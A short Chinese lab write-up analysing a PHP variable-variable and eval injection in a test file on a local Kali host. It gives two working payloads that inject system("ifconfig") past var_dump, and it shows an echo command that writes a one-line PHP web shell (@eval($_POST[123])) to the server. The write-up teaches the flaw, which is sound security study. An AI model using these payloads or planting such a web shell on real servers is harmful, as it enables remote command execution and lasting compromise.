一个小的知识点。。。
这里主要是一个关于$$变量覆盖问题和eval("var_dump($x);");中绕过var_dump造成命令执行漏洞的分析
我将PHP代码写在test.php文件里了
root@kali:/var/www/html# vi test.php代码内容:
<?php
$x = $_GET['x'];
eval("var_dump($$x);");
?>可以发现这里$$x实际就是一个变量覆盖问题,而$x变量又是我们可控的,所以就可以var_dump一些我们想打印的东西,例如payload:
http://192.168.43.242/test.php?x=x=abc
但是现在我想用eval执行一些系统命令,因为有var_dump(),所以我们需要绕过这个函数,执行其他函数,比如:exec()、passthru()、system()、 shell_exec()这些函数能够执行系统命令
利用一:
payload: x=x=1);system("ifconfig"
http://192.168.43.242/test.php?x=x=1);system("ifconfig"就可以绕过var_dump,执行system系统命令:
这个payload在代码中的呈现形式:
eval("var_dump(1);system("ifconfig");");; 执行将两条命令分割,均可执行,所以绕过了
利用二:
也可以直接在var_dump()函数当中执行执行系统命令 payload: x=x=system("ifconfig")
http://192.168.43.242/test.php?x=x=system("ifconfig")在代码中的呈现形式:
eval("var_dump(system("ifconfig"));");eval执行里面的代码,var_dump()打印出system()执行的结果
最后再说一个关于在linux系统中写一句话木马中可能会遇到的问题吧::
root@kali:/var/www/html# echo "<?php @eval($_POST[123]);?>" > mm.php向这样直接向服务器中写入木马时,它的内容会是这样:
$_POST不见了,原因是在shell编程中," " 中的 $xx 会被当做一个变量,所以这里需要用 -e 参数 转义
root@kali:/var/www/html# echo -e "<?php @eval(\$_POST[123]);?>" > mm.php结果:
